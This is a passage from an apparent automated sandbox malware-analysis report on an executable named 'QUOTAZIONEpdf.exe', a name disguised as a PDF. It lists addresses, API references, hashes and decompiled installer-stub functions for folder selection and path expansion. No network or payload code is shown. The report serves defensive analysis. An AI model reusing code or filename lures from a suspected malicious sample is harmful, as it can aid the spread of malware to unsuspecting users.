			}


























































                0x00404790
                0x00404796
                0x00404798
                0x0040479e
                0x004047a4
                0x004047b1
                0x004047ba
                0x004047bd
                0x004047c0
                0x004049e8
                0x004049ef
                0x00404a03
                0x004049f1
                0x004049f3
                0x004049f6
                0x004049f7
                0x004049fe
                0x004049fe
                0x00404a0f
                0x00404a1d
                0x00404a20
                0x00404a36
                0x00404aae
                0x00404ab1
                0x00404ab3
                0x00404abd
                0x00404acb
                0x00404acb
                0x00404acd
                0x00404ad7
                0x00404add
                0x00404afe
                0x00404adf
                0x00404aec
                0x00404aec
                0x00404add
                0x00404ad7
                0x00000000
                0x00404ab1
                0x00404a3b
                0x00404a46
                0x00404a4b
                0x00404a52
                0x00404a59
                0x00404a63
                0x00404a63
                0x00404a67
                0x00404a6c
                0x00404a71
                0x00404a87
                0x00404a73
                0x00404a73
                0x00404a7b
                0x00404a82
                0x00404a7d
                0x00404a7d
                0x00404a7d
                0x00404a7b
                0x00404a8b
                0x00404a8d
                0x00404a9b
                0x00404a9c
                0x00404aa8
                0x00404aab
                0x00404aab
                0x00404a6c
                0x00000000
                0x00404a59
                0x00404a3d
                0x00404a44
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404b01
                0x00404b01
                0x00404b08
                0x00404b7c
                0x00404b83
                0x00404b8f
                0x00404b8f
                0x00404b98
                0x00404b9a
                0x00404ba1
                0x00404ba4
                0x00404ba4
                0x00404baa
                0x00404bb1
                0x00404bb4
                0x00404bb4
                0x00404bba
                0x00404bc0
                0x00404bc6
                0x00404bc6
                0x00404bd3
                0x00404d20
                0x00404d27
                0x00404d44
                0x00404d4a
                0x00404d5c
                0x00404d5c
                0x00000000
                0x00404bd9
                0x00404bdb
                0x00404be3
                0x00404be7
                0x00404be7
                0x00404bef
                0x00404c30
                0x00404c32
                0x00404c42
                0x00404c45
                0x00404c4a
                0x00404c51
                0x00404c54
                0x00404cf6
                0x00404cfc
                0x00404d0a
                0x00404d1b
                0x00404d1b
                0x00000000
                0x00404d0a
                0x00404c5a
                0x00404c5d
                0x00404c63
                0x00404c68
                0x00404c6a
                0x00404c6c
                0x00404c72
                0x00404c79
                0x00404c7e
                0x00404c85
                0x00404c88
                0x00404c88
                0x00404c8f
                0x00404c9b
                0x00404c9f
                0x00404ca1
                0x00404ca1
                0x00404c91
                0x00404c93
                0x00404c93
                0x00404cc1
                0x00404ccd
                0x00404cdc
                0x00404cdc
                0x00404cde
                0x00404ce1
                0x00404cea
                0x00000000
                0x00404bf1
                0x00404bfc
                0x00404bff
                0x00404c04
                0x00404c06
                0x00404c0a
                0x00404c1a
                0x00404c24
                0x00404c26
                0x00404c29
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404c0c
                0x00404c0c
                0x00404c12
                0x00404c14
                0x00404c14
                0x00404c15
                0x00404c16
                0x00000000
                0x00404c0c
                0x00404bef
                0x00404bd3
                0x00404b10
                0x00000000
                0x00404b26
                0x00404b30
                0x00404b35
                0x00000000
                0x00000000
                0x00404b47
                0x00404b4c
                0x00404b58
                0x00404b58
                0x00404b5a
                0x00404b69
                0x00404b6b
                0x00404b72
                0x00404b75
                0x00000000
                0x00404b75
                0x00404b10
                0x004047c6
                0x004047cb
                0x004047d5
                0x004047d6
                0x004047df
                0x004047ea
                0x004047f5
                0x004047fb
                0x00404809
                0x0040481e
                0x00404823
                0x0040482e
                0x00404837
                0x0040484c
                0x0040485d
                0x0040486a
                0x0040486a
                0x0040486f
                0x00404875
                0x00404877
                0x0040487a
                0x0040487f
                0x00404884
                0x00404886
                0x00404886
                0x004048a6
                0x004048a6
                0x004048a8
                0x004048a9
                0x004048ae
                0x004048b1
                0x004048b4
                0x004048b8
                0x004048bd
                0x004048c2
                0x004048c6
                0x004048cb
                0x004048d0
                0x004048d2
                0x004048da
                0x004049a4
                0x004049b7
                0x00000000
                0x004048e0
                0x004048e3
                0x004048e6
                0x004048e9
                0x004048e9
                0x004048ef
                0x004048f5
                0x004048f8
                0x004048fe
                0x004048ff
                0x00404904
                0x0040490d
                0x00404914
                0x00404917
                0x0040491a
                0x0040491d
                0x00404959
                0x00404982
                0x0040495b
                0x00404968
                0x00404968
                0x0040491f
                0x00404922
                0x00404931
                0x0040493b
                0x00404943
                0x0040494a
                0x00404952
                0x00404952
                0x0040491d
                0x00404988
                0x00404989
                0x00404995
                0x00404995
                0x004049a2
                0x004049bd
                0x004049c1
                0x004049de
                0x004049e3
                0x004049e6
                0x00000000
                0x004049c3
                0x004049c8
                0x004049d1
                0x00404d5e
                0x00404d70
                0x00404d70
                0x004049c1
                0x00000000
                0x004049a2
                0x004048da

                APIs
                • GetDlgItem.USER32 ref: 00404789
                • GetDlgItem.USER32 ref: 00404796
                • GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
                • LoadBitmapA.USER32 ref: 004047F5
                • SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                • DeleteObject.GDI32(?), ref: 0040486F
                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                • GetWindowLongA.USER32 ref: 004049A9
                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
                • ShowWindow.USER32(?,00000005), ref: 004049C8
                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                • GlobalFree.KERNEL32 ref: 00404BB4
                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                • ShowWindow.USER32(?,00000000), ref: 00404D4A
                • GetDlgItem.USER32 ref: 00404D55
                • ShowWindow.USER32(00000000), ref: 00404D5C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                0x0040427b
                0x00404282
                0x0040428e
                0x0040429c
                0x004042a4
                0x004042a8
                0x004042ae
                0x004042ae
                0x004042ba
                0x0040432e
                0x00404335
                0x0040440a
                0x00404411
                0x00404420
                0x00404420
                0x00404424
                0x0040442a
                0x00404437
                0x00404439
                0x00404439
                0x00404447
                0x0040444c
                0x0040444f
                0x00404456
                0x00404459
                0x00404490
                0x00404492
                0x00404498
                0x0040449f
                0x004044a1
                0x004044a1
                0x004044bd
                0x004044f9
                0x00000000
                0x004044bf
                0x004044c2
                0x004044d6
                0x004044d8
                0x00000000
                0x004044d8
                0x0040445b
                0x0040445f
                0x0040448e
                0x0040448e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404461
                0x00404461
                0x0040446e
                0x00404473
                0x00000000
                0x00000000
                0x00404477
                0x00404479
                0x00404479
                0x00404484
                0x00404487
                0x0040448c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040448c
                0x004044e7
                0x004044ee
                0x004044f5
                0x004044fc
                0x004044fc
                0x00404501
                0x00404503
                0x0040450b
                0x00404511
                0x00404511
                0x00404521
                0x0040452b
                0x00404533
                0x00404549
                0x00404535
                0x00404539
                0x00404539
                0x00404533
                0x0040454e
                0x00404553
                0x00404558
                0x00404561
                0x00404561
                0x0040456a
                0x0040456c
                0x0040456c
                0x00404578
                0x00404580
                0x0040458a
                0x0040458a
                0x0040458f
                0x00000000
                0x0040458f
                0x00404459
                0x00404413
                0x0040441a
                0x00000000
                0x00000000
                0x00000000
                0x0040441a
                0x0040433b
                0x00404341
                0x0040435b
                0x00404360
                0x0040436a
                0x00404371
                0x00404380
                0x00404383
                0x00404386
                0x0040438d
                0x00404395
                0x00404398
                0x0040439c
                0x004043a3
                0x004043ab
                0x00404403
                0x004043ad
                0x004043ae
                0x004043b5
                0x004043bf
                0x004043c7
                0x004043d4
                0x004043e8
                0x004043ec
                0x004043ec
                0x004043e8
                0x004043f1
                0x004043fc
                0x004043fc
                0x004043ab
                0x00000000
                0x00404360
                0x0040434e
                0x00000000
                0x00000000
                0x00404354
                0x00000000
                0x004042bc
                0x004042bc
                0x004042c8
                0x004042d2
                0x004042df
                0x004042df
                0x004042e5
                0x004042ee
                0x004042f7
                0x004042fa
                0x004042fd
                0x00404305
                0x00404308
                0x0040430b
                0x00404313
                0x0040431a
                0x00404321
                0x00404595
                0x004045a7
                0x004045a7
                0x0040432c
                0x00000000
                0x0040432c

                APIs
                • GetDlgItem.USER32 ref: 004042C1
                • SetWindowTextA.USER32(?,?), ref: 004042EE
                • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                • lstrcmpiA.KERNEL32(afqfmqnwor,00420498,00000000,?,?), ref: 004043E0
                • lstrcatA.KERNEL32(?,afqfmqnwor), ref: 004043EC
                • SetDlgItemTextA.USER32 ref: 004043FC
                  • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                • SetDlgItemTextA.USER32 ref: 00404549
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                • String ID: A$C:\Users\user\AppData\Local\Temp$afqfmqnwor
                • API String ID: 2246997448-3340936956
                • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}





























                0x00405aa7
                0x00405aa7
                0x00405aa7
                0x00405aad
                0x00405ab2
                0x00405ac3
                0x00405ac3
                0x00405ace
                0x00405ad0
                0x00405ad5
                0x00405ad8
                0x00405ad9
                0x00405ae0
                0x00405ae2
                0x00405ae8
                0x00405aeb
                0x00405aeb
                0x00405cc0
                0x00405cc0
                0x00405cc4
                0x00000000
                0x00000000
                0x00405af8
                0x00405afe
                0x00000000
                0x00000000
                0x00405b04
                0x00405b05
                0x00405b08
                0x00405b0b
                0x00405cb3
                0x00405cbd
                0x00405cbf
                0x00405cbf
                0x00405cb5
                0x00405cb7
                0x00405cb9
                0x00405cba
                0x00405cba
                0x00000000
                0x00405cb3
                0x00405b11
                0x00405b15
                0x00405b1a
                0x00405b29
                0x00405b2c
                0x00405b2e
                0x00405b33
                0x00405b36
                0x00405b39
                0x00405b3c
                0x00405b3f
                0x00405b42
                0x00405c5d
                0x00405c60
                0x00405c90
                0x00405c93
                0x00405c98
                0x00405c9c
                0x00405c9c
                0x00405ca1
                0x00405ca2
                0x00405ca7
                0x00405caa
                0x00405cac
                0x00000000
                0x00405cac
                0x00405c62
                0x00405c65
                0x00405c7a
                0x00405c81
                0x00405c67
                0x00405c6e
                0x00405c6e
                0x00405c89
                0x00405c8c
                0x00405c55
                0x00405c56
                0x00405c56
                0x00000000
                0x00405c8c
                0x00405b4a
                0x00405b4b
                0x00405b51
                0x00405b53
                0x00405b6d
                0x00405b6d
                0x00405b74
                0x00405b74
                0x00405b7b
                0x00405b7f
                0x00405b7f
                0x00405b80
                0x00405b82
                0x00405bbb
                0x00405bbe
                0x00405bce
                0x00405bd1
                0x00405bd9
                0x00405bdf
                0x00405bdf
                0x00405c3b
                0x00405c3b
                0x00405c3d
                0x00000000
                0x00000000
                0x00405be3
                0x00405bea
                0x00405beb
                0x00405bed
                0x00405c07
                0x00405c15
                0x00405c1b
                0x00405c1d
                0x00405c38
                0x00405c38
                0x00405c38
                0x00000000
                0x00405c38
                0x00405c23
                0x00405c2e
                0x00405c34
                0x00405c36
                0x00000000
                0x00000000
                0x00000000
                0x00405c36
                0x00405bef
                0x00405bf2
                0x00000000
                0x00000000
                0x00405c01
                0x00405c03
                0x00405c05
                0x00000000
                0x00000000
                0x00000000
                0x00405c05
                0x00000000
                0x00405c3b
                0x00405bc6
                0x00000000
                0x00405b84
                0x00405b89
                0x00405b9f
                0x00405ba4
                0x00405ba7
                0x00405c44
                0x00405c44
                0x00405c48
                0x00405c50
                0x00405c50
                0x00000000
                0x00405c48
                0x00405bb1
                0x00405c3f
                0x00405c3f
                0x00405c42
                0x00000000
                0x00000000
                0x00000000
                0x00405c42
                0x00405b82
                0x00405b55
                0x00405b59
                0x00000000
                0x00000000
                0x00405b5b
                0x00405b5f
                0x00000000
                0x00000000
                0x00405b61
                0x00405b65
                0x00000000
                0x00405b67
                0x00405b67
                0x00000000
                0x00405b67
                0x00405b65
                0x00405cca
                0x00405cd4
                0x00405ce0
                0x00405ce0
                0x00000000

                APIs
                • GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                • GetWindowsDirectoryA.KERNEL32(afqfmqnwor,00000400), ref: 00405BD9
                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                • SHGetPathFromIDListA.SHELL32(00000000,afqfmqnwor), ref: 00405C23
                • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                • lstrcatA.KERNEL32(afqfmqnwor,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                • lstrlenA.KERNEL32(afqfmqnwor,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$afqfmqnwor
                • API String ID: 900638850-4158592220
                • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
